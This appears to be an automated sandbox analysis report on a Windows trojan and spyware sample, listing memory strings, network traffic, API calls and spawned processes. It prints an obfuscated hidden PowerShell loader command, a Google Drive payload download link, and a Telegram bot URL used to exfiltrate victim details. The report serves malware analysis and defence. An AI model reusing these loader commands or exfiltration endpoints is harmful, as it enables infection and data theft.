Source: msiexec.exe, 00000006.00000002.3023161132.00000000258F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.ionos.es
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://status.geotrust.com0
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.2429767028.00000000075B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.2424947064.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025923000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.3023161132.000000002592D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/A
Source: msiexec.exe, 00000006.00000002.3022462805.0000000024E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh17
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1y
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/(
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/F
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EBA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3009741267.0000000009EA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download
Source: msiexec.exe, 00000006.00000003.2596005460.0000000009EF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/o
Source: powershell.exe, 00000001.00000002.2424947064.0000000005037000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2428146158.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
Source: msiexec.exe, 00000006.00000002.3023161132.00000000257E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025854000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.000000002582D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71$
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.3024547427.0000000026896000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000268BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.3024547427.000000002684F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.0000000026ACA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3024547427.00000000269F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.3009741267.0000000009E8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026822944.0000000027B9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027BE8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3023161132.0000000025903000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3026906248.0000000027C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2540510272.0000000009EC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.3023161132.0000000025954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.3023161132.000000002595E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052F3

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032A0
Creates files inside the system directory
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\resources\Nebengeschfter.ini Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Windows\Fonts\thyrididae.ini Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00404B30 0_2_00404B30
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00407041 0_2_00407041
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_0040686A 0_2_0040686A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04CDE260 1_2_04CDE260
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8D278 6_2_02A8D278
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A85362 6_2_02A85362
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8C147 6_2_02A8C147
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8C738 6_2_02A8C738
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8C468 6_2_02A8C468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8CA08 6_2_02A8CA08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8E988 6_2_02A8E988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8F961 6_2_02A8F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A83E09 6_2_02A83E09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8CFA9 6_2_02A8CFA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8CCD8 6_2_02A8CCD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A87118 6_2_02A87118
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A829EC 6_2_02A829EC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A839EE 6_2_02A839EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A8E97B 6_2_02A8E97B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_02A89E55 6_2_02A89E55
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF8FB0 6_2_27EF8FB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF7B78 6_2_27EF7B78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFD308 6_2_27EFD308
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF81D0 6_2_27EF81D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFB7A8 6_2_27EFB7A8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF8FA1 6_2_27EF8FA1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFF788 6_2_27EFF788
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFD787 6_2_27EFD787
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF5780 6_2_27EF5780
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFD798 6_2_27EFD798
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFB798 6_2_27EFB798
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFF778 6_2_27EFF778
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF2749 6_2_27EF2749
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF2758 6_2_27EF2758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF7722 6_2_27EF7722
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF7720 6_2_27EF7720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4ECA 6_2_27EF4ECA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4ED0 6_2_27EF4ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF1EA8 6_2_27EF1EA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF1E98 6_2_27EF1E98
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFEE68 6_2_27EFEE68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFCE67 6_2_27EFCE67
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6E62 6_2_27EF6E62
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFCE78 6_2_27EFCE78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6E70 6_2_27EF6E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFEE57 6_2_27EFEE57
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4620 6_2_27EF4620
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4610 6_2_27EF4610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF15E8 6_2_27EF15E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF15F8 6_2_27EF15F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF0D48 6_2_27EF0D48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE548 6_2_27EFE548
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC548 6_2_27EFC548
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC558 6_2_27EFC558
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE538 6_2_27EFE538
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF0489 6_2_27EF0489
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6488 6_2_27EF6488
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF0498 6_2_27EF0498
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF3460 6_2_27EF3460
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6478 6_2_27EF6478
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF345F 6_2_27EF345F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFBC29 6_2_27EFBC29
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFDC28 6_2_27EFDC28
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFBC38 6_2_27EFBC38
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFDC19 6_2_27EFDC19
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFFC18 6_2_27EFFC18
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF5BCA 6_2_27EF5BCA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF5BD8 6_2_27EF5BD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF2BAF 6_2_27EF2BAF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF2BB0 6_2_27EF2BB0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF7B77 6_2_27EF7B77
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF5328 6_2_27EF5328
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFB307 6_2_27EFB307
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF2300 6_2_27EF2300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF531A 6_2_27EF531A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFB318 6_2_27EFB318
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFF2E7 6_2_27EFF2E7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFF2F8 6_2_27EFF2F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFD2F7 6_2_27EFD2F7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF22F0 6_2_27EF22F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF72C8 6_2_27EF72C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF72B8 6_2_27EF72B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4A68 6_2_27EF4A68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF4A78 6_2_27EF4A78
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF1A41 6_2_27EF1A41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF1A50 6_2_27EF1A50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6A07 6_2_27EF6A07
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6A18 6_2_27EF6A18
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC9E8 6_2_27EFC9E8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE9C8 6_2_27EFE9C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE9D8 6_2_27EFE9D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC9D8 6_2_27EFC9D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF11A0 6_2_27EF11A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF1190 6_2_27EF1190
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFA928 6_2_27EFA928
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFA938 6_2_27EFA938
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF08E0 6_2_27EF08E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF08F0 6_2_27EF08F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC0C8 6_2_27EFC0C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE0A7 6_2_27EFE0A7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF38B8 6_2_27EF38B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFE0B8 6_2_27EFE0B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EFC0B7 6_2_27EFC0B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF0040 6_2_27EF0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6022 6_2_27EF6022
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF6030 6_2_27EF6030
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF3008 6_2_27EF3008
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF3007 6_2_27EF3007
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_27EF0011 6_2_27EF0011
PE / OLE file has an invalid certificate
Source: Adeleidae.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: Adeleidae.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/19@6/6
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032A0
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045B4
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Users\user\AppData\Local\peritonealizing Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Users\user\Desktop\Adeleidae.exe File created: C:\Users\user\AppData\Local\Temp\nsqC038.tmp Jump to behavior
Source: Adeleidae.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Adeleidae.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Adeleidae.exe ReversingLabs: Detection: 13%
Source: Adeleidae.exe Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\Adeleidae.exe File read: C:\Users\user\Desktop\Adeleidae.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Adeleidae.exe "C:\Users\user\Desktop\Adeleidae.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Adeleidae.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Section loaded: kernel.appcore.dll Jump to behavior
